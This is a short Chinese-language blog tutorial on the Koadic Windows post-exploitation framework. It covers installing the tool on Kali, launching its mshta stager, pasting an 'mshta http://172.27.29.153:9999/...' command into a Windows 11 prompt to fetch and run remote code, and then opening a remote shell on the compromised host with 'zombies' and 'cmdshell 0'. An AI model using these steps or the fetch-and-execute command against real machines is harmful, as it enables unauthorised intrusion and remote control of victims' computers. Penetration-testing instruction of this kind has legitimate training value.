Koadic是一个强大的渗透测试工具,它是一个Windows后渗透测试框架,用于在目标系统上进行后渗透操作。它提供了一个灵活且易于使用的命令行界面,可以执行各种攻击活动,例如执行命令、上传和下载文件、执行各种后渗透技巧等。
Koadic基于JavaScript,并使用VBScript来实现攻击。它利用了Windows系统自带的一些功能和漏洞,以便在目标系统上运行后渗透模块。它还提供了一些特定于Windows环境的功能,例如通过Windows管理工具执行命令、绕过防火墙等。
Koadic的设计目标是快速、灵活和易于使用。它提供了一个功能强大的插件架构,允许用户编写自己的模块和脚本,以适应不同的渗透测试需求。它还支持多种传输协议,包括HTTP、HTTPS、SMB和DNS,以便在各种网络环境中执行攻击。
总而言之,Koadic是一个功能强大、灵活和易于使用的后渗透框架,适用于对Windows系统进行渗透测试和安全评估。它提供了一系列强大的工具和技术,使渗透测试人员能够有效地获取目标系统的权限和控制。
今天我们演示怎么使用Koadic入侵Windows电脑。
首先,koadic在高版本的kali中无法直接使用,需要使用apt下载命令下载koadic。
apt update
apt-get install koadic
安装完毕后,输入koadic验证安装。
可见,它成功打开了koadic的文本界面,模块默认是 sta/js/mshta。
直接输入run,不用其它配置,可以看到它显示了钓鱼网址:
如果显示上面的界面就代表成功了。
在Windows11的cmd上粘贴命令(mshta http://172.27.29.153:9999/kAVa3)。
我的主机:NULL-HONKER\admin被控制。
试试输入zombies查看主机编号,我的编号是0,所以输入cmdshell 编号进入僵尸主机。
zombies
cmdshell 编号
我的编号是0,所以就是cmdshell 0
尝试输入dir(查看目录下文件命令):
如果显示以下内容就代表入侵成功了。
190
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
